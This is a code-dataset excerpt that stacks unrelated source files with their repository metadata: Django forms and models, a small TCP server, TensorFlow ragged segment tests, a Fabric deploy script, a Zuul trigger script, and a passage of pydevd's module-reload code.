import floppyforms as forms
from coop_html_editor.widgets import get_inline_html_widget
from ...forms.articles import NewArticleForm, ArticleSettingsForm
from ...forms.base import InlineHtmlEditableModelForm
from ...forms.newsletters import NewsletterSettingsForm
from .models import TestClass
class TestClassForm(InlineHtmlEditableModelForm):
"""for unit-testing"""
class Meta:
model = TestClass
fields = ('field1', 'field2', 'field3', 'bool_field', 'int_field', 'float_field')
widgets = {
'field2': get_inline_html_widget(),
}
no_inline_html_widgets = ('field2', 'field3', 'bool_field', 'int_field', 'float_field')
class MyNewArticleForm(NewArticleForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
class MyArticleSettingsForm(ArticleSettingsForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
class MyNewsletterSettingsForm(NewsletterSettingsForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
|
[
"ljean@apidev.fr"
] |
ljean@apidev.fr
|
ac377b70a426b10934be128abc5faaeed5e06d15
|
6ee04bffb8da70a9165cf653ffe6cfadc9db3e2d
|
/exercicios/vp2/funcao10.py
|
0817a913cba3605080882f0483fcd06a4bdf2f09
|
[] |
no_license
|
dudumendes/fundamentos-programacao-20192
|
3a222a54d4912c7f690b71a4ed8d451dc2148c5b
|
88bc4c56a02b907c60b8054d2807eea8547e5c79
|
refs/heads/master
| 2020-07-07T14:41:34.715156
| 2019-11-26T14:05:29
| 2019-11-26T14:05:29
| 203,378,337
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
def saudar(nome) :
print("Ola, " + nome)
def crazyFunction(x , y) :
x = 2 * y + 3 * x ** (1/2)
y = x * y + 10
return [x , y]
resultado = crazyFunction(144, 20)
print("x = ", resultado[0])
print("y = ", resultado[1])
saudar("Adamor")
|
[
"eduardomendes@Eduardos-MacBook-Pro.local"
] |
eduardomendes@Eduardos-MacBook-Pro.local
|
f8458def60b40aa310866e09606019c8ff2c8aff
|
f65a4f7cb42ae5e8c00b1daa5a0b3eb3ec2a7b60
|
/recognition/models.py
|
646abef020d26203e6cf3314cbef5157b95405c9
|
[] |
no_license
|
AbdelLoughlam/PFE_Projet
|
cffd4cb59d9a0f42b82504d8ce34c9f43881f0c5
|
4d266ab00dbc9278edd25cfea528f18f2bf2ada3
|
refs/heads/main
| 2023-06-24T11:46:58.033027
| 2021-07-23T12:34:23
| 2021-07-23T12:34:23
| 371,154,310
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 304
|
py
|
from django.db import models
from django.db import models
from django.contrib.auth.models import User
#
# Create your models here.
#
class Student(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)
def __str__(self):
return self.user.username
|
[
"loughlamabdel@gmail.com"
] |
loughlamabdel@gmail.com
|
9db5b75d65860c2837340291129b71ff7b1509c0
|
c59b7bc356de12827774d3bca79558aba738e1dc
|
/TODO/testTcp.py
|
755ace8831ea084e73f9dc2d2f2eeb8b0b96e514
|
[] |
no_license
|
yishan33/tinyTreasure
|
0e24a860bbe47c993ac790564e6e75783b520e66
|
06a2e8e9ffa5f334daba0f79fc689e97603f5bc5
|
refs/heads/master
| 2020-05-19T22:37:36.966028
| 2015-11-17T02:59:43
| 2015-11-17T02:59:43
| 39,127,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
#!/usr/bin/python
import socket
import select
port = 1111
index = 1
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.bind(('192.168.1.158', port))
serverSocket.listen(10)
print 'server is working...'
while True:
client, addr = serverSocket.accept()
print 'already have client------------'
while True:
data = client.recv(1024)
print data, index
if not data:
print 'nill'
# client.close(
backData = 'back % i/r/n/r/n' % index
client.send(backData)
index += 1
# else :
# print data
# if data == '':
# print 'connect'
# else :
# print data
# client.send(backData)
print 'log out'
|
[
"ljl@BMImatoMac-mini.local"
] |
ljl@BMImatoMac-mini.local
|
3330299963393125d538e86655ae557251ea76fc
|
e1a9c0cbb1d40aed46e3c97a16133584a1e8b327
|
/JE_todo/todo_app/migrations/0001_initial.py
|
928cc1f98715580ccdedc637a7c4470a750078be
|
[] |
no_license
|
timfilipowski88/random_projects
|
f9177b60773a324f6c52c398adea4632c2ad5b54
|
a8993be59626534d4f393fb109d31ff36ab66beb
|
refs/heads/master
| 2023-04-28T20:51:26.844964
| 2021-05-15T04:49:32
| 2021-05-15T04:49:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
# Generated by Django 2.2 on 2021-03-28 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='List',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
],
),
]
|
[
"timfilipowski88@gmail.com"
] |
timfilipowski88@gmail.com
|
b393f63f6ac9ee26aceb40dd7bb00e64e25785d3
|
d806dd4a6791382813d2136283a602207fb4b43c
|
/sirius/blueprints/api/remote_service/tula/passive/childbirth/views.py
|
1e86681447f1b9f6b1e9f4f7d3e504d827b7a501
|
[] |
no_license
|
MarsStirner/sirius
|
5bbf2a03dafb7248db481e13aff63ff989fabbc2
|
8839460726cca080ca8549bacd3a498e519c8f96
|
refs/heads/master
| 2021-03-24T12:09:14.673193
| 2017-06-06T16:28:53
| 2017-06-06T16:28:53
| 96,042,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,382
|
py
|
#! coding:utf-8
"""
@author: BARS Group
@date: 03.10.2016
"""
import sys
from flask import request
from sirius.blueprints.api.remote_service.tula.app import module
from sirius.blueprints.api.remote_service.tula.entities import TulaEntityCode
from sirius.blueprints.api.remote_service.tula.passive.childbirth.xform import \
ChildbirthTulaXForm
from sirius.blueprints.monitor.exception import remote_api_method
from sirius.blueprints.monitor.logformat import hook
parent_id_name = 'card_id'
@module.route('/api/integration/<int:api_version>/card/<' + parent_id_name + '>/childbirth/',
methods=['POST', 'PUT', 'DELETE'])
@remote_api_method(hook=hook)
def api_childbirth_change(api_version, **kwargs):
# main_id = kwargs.get(main_id_name)
parent_id = kwargs.get(parent_id_name)
stream_id = kwargs.get('stream_id')
data = None
delete = request.method == 'DELETE'
xform = ChildbirthTulaXForm(api_version, stream_id)
if not delete:
data = request.get_json()
xform.validate(data)
# main_id = data.get('main_id')
# xform.check_params(card_id, main_id, data)
service_name = sys._getframe().f_code.co_name
parents_params = {
parent_id_name: {'entity': TulaEntityCode.CARD, 'id': parent_id},
}
xform.send_messages(parent_id, parent_id_name, data, service_name, request.method, parents_params)
|
[
"paschenko@bars-open.ru"
] |
paschenko@bars-open.ru
|
c6569d076ffb391b828b0b0ad13e3266739a768b
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/attestation/v20210601preview/_enums.py
|
647247b71cec4cfaee5ae075082eafac95c1b2cc
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'PrivateEndpointServiceConnectionStatus',
'PublicNetworkAccessType',
]
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class PublicNetworkAccessType(str, Enum):
"""
Controls whether traffic from the public network is allowed to access the Attestation Provider APIs.
"""
ENABLED = "Enabled"
"""Enables public network connectivity to the Attestation Provider REST APIs."""
DISABLED = "Disabled"
"""Disables public network connectivity to the Attestation Provider REST APIs."""
|
[
"noreply@github.com"
] |
noreply@github.com
|
0db5944ca26ded9a495afea5174be02aae5227b6
|
4671a70af604078c1c75ec11721620c091ee2873
|
/bootcampBot_2.py
|
7d12196e0688da826a29181db98821e546114d8f
|
[] |
no_license
|
raheels88/DiscordPY_Bootcamp
|
a02b11a7755e2e3ebe402c86ba8071e77ec89f8a
|
50bf5de85aa8c3180d49c4c7f35b87714ed3fe40
|
refs/heads/main
| 2023-07-15T17:22:42.551506
| 2021-08-18T18:29:21
| 2021-08-18T18:29:21
| 396,949,602
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
import discord
import os
from yahoo_fin import stock_info as si #import yahoo_fin Python package - used to scrape stock price data from Yahoo Finance
client = discord.Client()
@client.event
async def on_ready():
print('Beep Boop Beep...{0.user}'.format(client) + ' is online')
#### MAKE YOUR BOT FETCH LIVE STOCK PRICES ###
@client.event
async def on_message(message):
msg = message.content
if message.author == client.user:
return
if msg.startswith('$hello'):
await message.channel.send('Hello!')
if msg.startswith('!price'): #if the message (sent by anyone but the bot) starts with '$price'...
ticker = msg[7:] #assign the variable 'ticker' to be the contents of the message from the 7th character onwards
price = round(si.get_live_price(ticker),2) #get_live_price is a method in the yahoo_fin package - this line gets the live price and rounds to 2 decimal places, and assigns the value to 'price'
await message.channel.send('Price of ' + ticker + ' is $' + str(price)) #Concatenate ticker and price variables with a + sign
client.run(os.getenv('TOKEN'))
|
[
"noreply@github.com"
] |
noreply@github.com
|
0c0a1446e1f0184e7126eb177937b571e856de8d
|
84a96dbd96e926ebb5c658e3cb897db276c32d6c
|
/tensorflow/python/ops/ragged/ragged_segment_op_test.py
|
d29708a5f5d98360502b4aef830d8d7c69c18c5c
|
[
"Apache-2.0"
] |
permissive
|
MothCreations/gavlanWheels
|
bc9189092847369ad291d1c7d3f4144dd2239359
|
01d8a43b45a26afec27b971f686f79c108fe08f9
|
refs/heads/master
| 2022-12-06T09:27:49.458800
| 2020-10-13T21:56:40
| 2020-10-13T21:56:40
| 249,206,716
| 6
| 5
|
Apache-2.0
| 2022-11-21T22:39:47
| 2020-03-22T14:57:45
|
C++
|
UTF-8
|
Python
| false
| false
| 9,618
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged_range op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl.testing import parameterized
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import googletest
def prod(values):
val = 1
for v in values:
val *= v
return val
# return reduce(lambda x, y: x * y, values, 1)
def mean(values):
return 1.0 * sum(values) / len(values)
def sqrt_n(values):
return 1.0 * sum(values) / math.sqrt(len(values))
@test_util.run_all_in_graph_and_eager_modes
class RaggedSegmentOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def expected_value(self, data, segment_ids, num_segments, combiner):
"""Find the expected value for a call to ragged_segment_<aggregate>.
Args:
data: The input RaggedTensor, expressed as a nested python list.
segment_ids: The segment ids, as a python list of ints.
num_segments: The number of segments, as a python int.
combiner: The Python function used to combine values.
Returns:
The expected value, as a nested Python list.
"""
self.assertLen(data, len(segment_ids))
# Build an empty (num_segments x ncols) "grouped" matrix
ncols = max(len(row) for row in data)
grouped = [[[] for _ in range(ncols)] for row in range(num_segments)]
# Append values from data[row] to grouped[segment_ids[row]]
for row in range(len(data)):
for col in range(len(data[row])):
grouped[segment_ids[row]][col].append(data[row][col])
# Combine the values.
return [[combiner(values)
for values in grouped_row
if values]
for grouped_row in grouped]
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Int(self, segment_op, combiner, segment_ids):
rt_as_list = [[0, 1, 2, 3], [4], [], [5, 6], [7], [8, 9]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllEqual(segmented, expected)
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Float(self, segment_op, combiner, segment_ids):
rt_as_list = [[0., 1., 2., 3.], [4.], [], [5., 6.], [7.], [8., 9.]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllClose(segmented, expected)
def testRaggedRankTwo(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids1 = [0, 2, 2, 2]
segmented1 = ragged_math_ops.segment_sum(rt, segment_ids1, 3)
expected1 = [[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[411, 412], [321, 322], [331]] # row 2
] # pyformat: disable
self.assertAllEqual(segmented1, expected1)
segment_ids2 = [1, 2, 1, 1]
segmented2 = ragged_math_ops.segment_sum(rt, segment_ids2, 3)
expected2 = [[],
[[111+411, 112+412, 113, 114], [121+321, 322], [331]],
[]] # pyformat: disable
self.assertAllEqual(segmented2, expected2)
def testRaggedSegmentIds(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [], [1, 1, 2], [2]])
segmented = ragged_math_ops.segment_sum(rt, segment_ids, 3)
expected = [[],
[111+321, 112+322, 113, 114],
[121+331+411, 412]] # pyformat: disable
self.assertAllEqual(segmented, expected)
def testShapeMismatchError1(self):
dt = constant_op.constant([1, 2, 3, 4, 5, 6])
segment_ids = ragged_factory_ops.constant([[1, 2], []])
self.assertRaisesRegexp(
ValueError, 'segment_ids.shape must be a prefix of data.shape, '
'but segment_ids is ragged and data is not.',
ragged_math_ops.segment_sum, dt, segment_ids, 3)
def testShapeMismatchError2(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [1], [1, 1, 2], [2]])
# Error is raised at graph-building time if we can detect it then.
self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*',
ragged_math_ops.segment_sum, rt, segment_ids, 3)
# Otherwise, error is raised when we run the graph.
segment_ids2 = ragged_tensor.RaggedTensor.from_row_splits(
array_ops.placeholder_with_default(segment_ids.values, None),
array_ops.placeholder_with_default(segment_ids.row_splits, None))
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*'):
self.evaluate(ragged_math_ops.segment_sum(rt, segment_ids2, 3))
if __name__ == '__main__':
googletest.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
636287a026b036c4db22cc1f8fbad2a93d1e3f6b
|
90e39e45d469bb5dd9cb36805a88c97f41c147de
|
/2-do_deploy_web_static.py
|
5fc6c711832e5b59a00fa0831b049af1e986aac4
|
[] |
no_license
|
Noeuclides/AirBnB_clone_v2
|
372b3d01ba76d41a79dca166d6ca7d471749a07d
|
13fac5127af0149e7bef9a94b70e6d2746eeb4fd
|
refs/heads/master
| 2020-07-03T19:16:10.404783
| 2019-09-11T00:42:29
| 2019-09-11T00:42:29
| 202,020,044
| 0
| 2
| null | 2019-08-19T03:08:39
| 2019-08-12T22:44:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#!/usr/bin/python3
from datetime import datetime
from fabric.api import *
from os import path
'''automatize with fabric
'''
'''env.user = 'localhost'
'''
env.hosts = ['35.231.53.89', '35.190.176.186']
def do_pack():
'''making a pack on web_static folder
'''
now = datetime.now()
file = 'web_static_' + now.strftime("%Y%m%d%H%M%S") + '.' + 'tgz'
local("mkdir -p versions")
check = local("tar -cvzf versions/{} web_static".format(file))
if check is not None:
return file
else:
return None
def do_deploy(archive_path):
'''distribute an archive to web servers
'''
print(archive_path)
print(str(path.exists(archive_path)))
if str(path.exists(archive_path)) is False:
return False
oper = []
file = archive_path.split("/")
oper.append(put(archive_path, '/tmp'))
folder = file[1].split('.')
print(folder[0])
oper.append(
run("mkdir -p /data/web_static/releases/{}".format(
folder[0])))
oper.append(run(
"tar -xzf /tmp/{file} -C /data/web_static/releases/{}".format(
file[1], folder[0])))
oper.append(run("rm /tmp/{}".format(file[1])))
oper.append(run("mv /data/web_static/releases/{0}/web_static/* /data/web_static/releases/{0}".format(
folder[0])))
oper.append(run(
"rm -rf /data/web_static/releases/{}/web_static".format(
folder[0])))
oper.append(run("rm -rf /data/web_static/current"))
oper.append(run(
"ln -s /data/web_static/releases/{}/ /data/web_static/current".format(
folder[0])))
print(oper)
for op in oper:
if op is False:
return False
return True
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
d6c678a5c8917fadd314e706e27629319dcc78b8
|
0a8198af8ca152a26b7bbbf0006bf19f37cd3a0c
|
/modules/zuul/files/zuul-test-repo.py
|
3b790b81f2975da22887495a663e7fbc2a6cf5f4
|
[] |
no_license
|
dkuspawono/puppet
|
938f05ea77cea35059d6ff1eb0b4c2b89a170a00
|
75e0dd3698efa8e7cf95f6ef1348d16a299faa82
|
refs/heads/production
| 2021-05-12T01:27:57.528282
| 2019-08-03T01:15:51
| 2019-08-03T01:15:51
| 117,557,149
| 0
| 0
| null | 2018-08-23T11:51:02
| 2018-01-15T14:42:53
|
Puppet
|
UTF-8
|
Python
| false
| false
| 2,172
|
py
|
#!/usr/bin/env python2
"""Easily trigger zuul pipelines for a Gerrit repository."""
# Copyright 2015 Legoktm
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import requests
import subprocess
import sys
if len(sys.argv) < 2:
print('Usage: zuul-test-repo repository [pipeline]')
sys.exit(1)
repo = sys.argv[1]
try:
pipeline = sys.argv[2]
except IndexError:
pipeline = 'test'
if repo.startswith('ext:'):
# Allow "ext:MassMessage" as shorthand
repos = ['mediawiki/extensions/' + repo.split(':', 1)[1]]
elif repo.startswith('file:'):
# Or entire files with "file:/home/foobar/list"
with open(repo.split(':', 1)[1]) as f:
repos = f.read().splitlines()
else:
repos = [repo]
def test_repo(repo):
# Fetch the latest change for the repo from the Gerrit API
r = requests.get('https://gerrit.wikimedia.org/r/changes/?'
'q=status:merged+project:%s&n=1&o=CURRENT_REVISION'
% repo)
data = json.loads(r.text[4:])
if not data:
print('Error, could not find any changes in %s.' % repo)
sys.exit(1)
change = data[0]
change_number = change['_number']
patchset = change['revisions'][change['current_revision']]['_number']
print('Going to test %s@%s,%s' % (repo, change_number, patchset))
subprocess.call(['zuul', 'enqueue',
'--trigger', 'gerrit',
'--pipeline', pipeline,
'--project', repo,
'--change', '%s,%s' % (change_number, patchset)])
if __name__ == '__main__':
for repo in repos:
test_repo(repo)
|
[
"dzahn@wikimedia.org"
] |
dzahn@wikimedia.org
|
6ccc7f4bb583c7554918ac244ca1883a446d6583
|
8f2c55a2530c3e59dab5907c0044c618b88dd09b
|
/_pydevd_bundle/pydevd_reload.py
|
507e73be2481c064a04777f28cadb48cc7177f70
|
[
"Apache-2.0",
"EPL-1.0"
] |
permissive
|
fabioz/PyDev.Debugger
|
5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d
|
26864816cbfcf002a99913bcc31ebef48042a4ac
|
refs/heads/main
| 2023-08-18T01:08:34.323363
| 2023-04-15T11:15:47
| 2023-04-15T11:15:47
| 21,870,144
| 363
| 126
|
Apache-2.0
| 2023-07-30T23:03:31
| 2014-07-15T18:01:12
|
Python
|
UTF-8
|
Python
| false
| false
| 15,773
|
py
|
"""
Based on the python xreload.
Changes
======================
1. we don't recreate the old namespace from new classes. Rather, we keep the existing namespace,
load a new version of it and update only some of the things we can inplace. That way, we don't break
things such as singletons or end up with a second representation of the same class in memory.
2. If we find it to be a __metaclass__, we try to update it as a regular class.
3. We don't remove old attributes (and leave them lying around even if they're no longer used).
4. Reload hooks were changed
These changes make it more stable, especially in the common case (where in a debug session only the
contents of a function are changed), besides providing flexibility for users that want to extend
on it.
Hooks
======================
Classes/modules can be specially crafted to work with the reload (so that it can, for instance,
update some constant which was changed).
1. To participate in the change of some attribute:
In a module:
__xreload_old_new__(namespace, name, old, new)
in a class:
@classmethod
__xreload_old_new__(cls, name, old, new)
A class or module may include a method called '__xreload_old_new__' which is called when we're
unable to reload a given attribute.
2. To do something after the whole reload is finished:
In a module:
__xreload_after_reload_update__(namespace):
In a class:
@classmethod
__xreload_after_reload_update__(cls):
A class or module may include a method called '__xreload_after_reload_update__' which is called
after the reload finishes.
Important: when providing a hook, always use the namespace or cls provided and not anything in the global
namespace, as the global namespace are only temporarily created during the reload and may not reflect the
actual application state (while the cls and namespace passed are).
Current limitations
======================
- Attributes/constants are added, but not changed (so singletons and the application state is not
broken -- use provided hooks to workaround it).
- Code using metaclasses may not always work.
- Functions and methods using decorators (other than classmethod and staticmethod) are not handled
correctly.
- Renamings are not handled correctly.
- Dependent modules are not reloaded.
- New __slots__ can't be added to existing classes.
Info
======================
Original: http://svn.python.org/projects/sandbox/trunk/xreload/xreload.py
Note: it seems https://github.com/plone/plone.reload/blob/master/plone/reload/xreload.py enhances it (to check later)
Interesting alternative: https://code.google.com/p/reimport/
Alternative to reload().
This works by executing the module in a scratch namespace, and then patching classes, methods and
functions in place. This avoids the need to patch instances. New objects are copied into the
target namespace.
"""
from _pydev_bundle.pydev_imports import execfile
from _pydevd_bundle import pydevd_dont_trace
import types
from _pydev_bundle import pydev_log
from _pydevd_bundle.pydevd_constants import get_global_debugger
NO_DEBUG = 0
LEVEL1 = 1
LEVEL2 = 2
DEBUG = NO_DEBUG
def write_err(*args):
py_db = get_global_debugger()
if py_db is not None:
new_lst = []
for a in args:
new_lst.append(str(a))
msg = ' '.join(new_lst)
s = 'code reload: %s\n' % (msg,)
cmd = py_db.cmd_factory.make_io_message(s, 2)
if py_db.writer is not None:
py_db.writer.add_command(cmd)
def notify_info0(*args):
write_err(*args)
def notify_info(*args):
if DEBUG >= LEVEL1:
write_err(*args)
def notify_info2(*args):
if DEBUG >= LEVEL2:
write_err(*args)
def notify_error(*args):
write_err(*args)
#=======================================================================================================================
# code_objects_equal
#=======================================================================================================================
def code_objects_equal(code0, code1):
for d in dir(code0):
if d.startswith('_') or 'line' in d or d in ('replace', 'co_positions', 'co_qualname'):
continue
if getattr(code0, d) != getattr(code1, d):
return False
return True
#=======================================================================================================================
# xreload
#=======================================================================================================================
def xreload(mod):
"""Reload a module in place, updating classes, methods and functions.
mod: a module object
Returns a boolean indicating whether a change was done.
"""
r = Reload(mod)
r.apply()
found_change = r.found_change
r = None
pydevd_dont_trace.clear_trace_filter_cache()
return found_change
# This isn't actually used... Initially I planned to reload variables which are immutable on the
# namespace, but this can destroy places where we're saving state, which may not be what we want,
# so, we're being conservative and giving the user hooks if he wants to do a reload.
#
# immutable_types = [int, str, float, tuple] #That should be common to all Python versions
#
# for name in 'long basestr unicode frozenset'.split():
# try:
# immutable_types.append(__builtins__[name])
# except:
# pass #Just ignore: not all python versions are created equal.
# immutable_types = tuple(immutable_types)
#=======================================================================================================================
# Reload
#=======================================================================================================================
class Reload:
def __init__(self, mod, mod_name=None, mod_filename=None):
self.mod = mod
if mod_name:
self.mod_name = mod_name
else:
self.mod_name = mod.__name__ if mod is not None else None
if mod_filename:
self.mod_filename = mod_filename
else:
self.mod_filename = mod.__file__ if mod is not None else None
self.found_change = False
def apply(self):
mod = self.mod
self._on_finish_callbacks = []
try:
# Get the module namespace (dict) early; this is part of the type check
modns = mod.__dict__
# Execute the code. We copy the module dict to a temporary; then
# clear the module dict; then execute the new code in the module
# dict; then swap things back and around. This trick (due to
# Glyph Lefkowitz) ensures that the (readonly) __globals__
# attribute of methods and functions is set to the correct dict
# object.
new_namespace = modns.copy()
new_namespace.clear()
if self.mod_filename:
new_namespace["__file__"] = self.mod_filename
try:
new_namespace["__builtins__"] = __builtins__
except NameError:
raise # Ok if not there.
if self.mod_name:
new_namespace["__name__"] = self.mod_name
if new_namespace["__name__"] == '__main__':
# We do this because usually the __main__ starts-up the program, guarded by
# the if __name__ == '__main__', but we don't want to start the program again
# on a reload.
new_namespace["__name__"] = '__main_reloaded__'
execfile(self.mod_filename, new_namespace, new_namespace)
# Now we get to the hard part
oldnames = set(modns)
newnames = set(new_namespace)
# Create new tokens (note: not deleting existing)
for name in newnames - oldnames:
notify_info0('Added:', name, 'to namespace')
self.found_change = True
modns[name] = new_namespace[name]
# Update in-place what we can
for name in oldnames & newnames:
self._update(modns, name, modns[name], new_namespace[name])
self._handle_namespace(modns)
for c in self._on_finish_callbacks:
c()
del self._on_finish_callbacks[:]
except:
pydev_log.exception()
def _handle_namespace(self, namespace, is_class_namespace=False):
on_finish = None
if is_class_namespace:
xreload_after_update = getattr(namespace, '__xreload_after_reload_update__', None)
if xreload_after_update is not None:
self.found_change = True
on_finish = lambda: xreload_after_update()
elif '__xreload_after_reload_update__' in namespace:
xreload_after_update = namespace['__xreload_after_reload_update__']
self.found_change = True
on_finish = lambda: xreload_after_update(namespace)
